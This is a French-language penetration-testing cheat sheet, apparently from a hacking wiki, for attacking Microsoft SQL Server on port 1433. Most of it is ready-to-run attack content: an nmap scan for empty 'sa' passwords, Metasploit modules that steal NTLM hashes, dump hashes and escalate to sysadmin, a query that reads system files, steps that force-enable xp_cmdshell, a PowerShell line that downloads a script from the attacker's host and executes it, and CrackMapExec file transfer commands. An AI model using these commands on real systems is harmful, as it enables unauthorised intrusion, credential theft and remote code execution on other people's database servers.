🔢MS-SQL - port 1433

Techniques d'exploitation des services Microsoft SQL Server

Scan

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Modules metasploit

Attention: Nécessite des identifiants.

#Vol de NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Execution de code
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload

#Ajouter un nouvel administrateur depuis une session meterpreter
msf> use windows/manage/mssql_local_auth_bypass

Connexion

Depuis machine linux

sqsh -S <IP> -U <Username> -P <Password> -D <Database>

Depuis une machine Windows

Télécharger SSMS (SQL Server Management Studio)

https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms

Plus pratique (Interface graphique)

Lire des fichiers internes

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

Exécution de code

Pour executer du code sur MSSQL, il faut que xp_cmdshell soit activé. Si il ne l'est pas, il est possible de forcer son activation avec les droits suffisants.

Vérification

> xp_cmdshell `whoami`;
> go

Activer xp_cmdshell

> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
        
        
> xp_cmdshell `whoami`;
> go

Forcer l'activation

> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
        
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
        
> xp_cmdshell 'whoami';
> go

Téléchargement de fichier

> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go

Avec CrackMapExec

#Téléchargement
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path

#Upload
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt
PrécédentRsync - port 873SuivantDocker - port 2375

Dernière mise à jour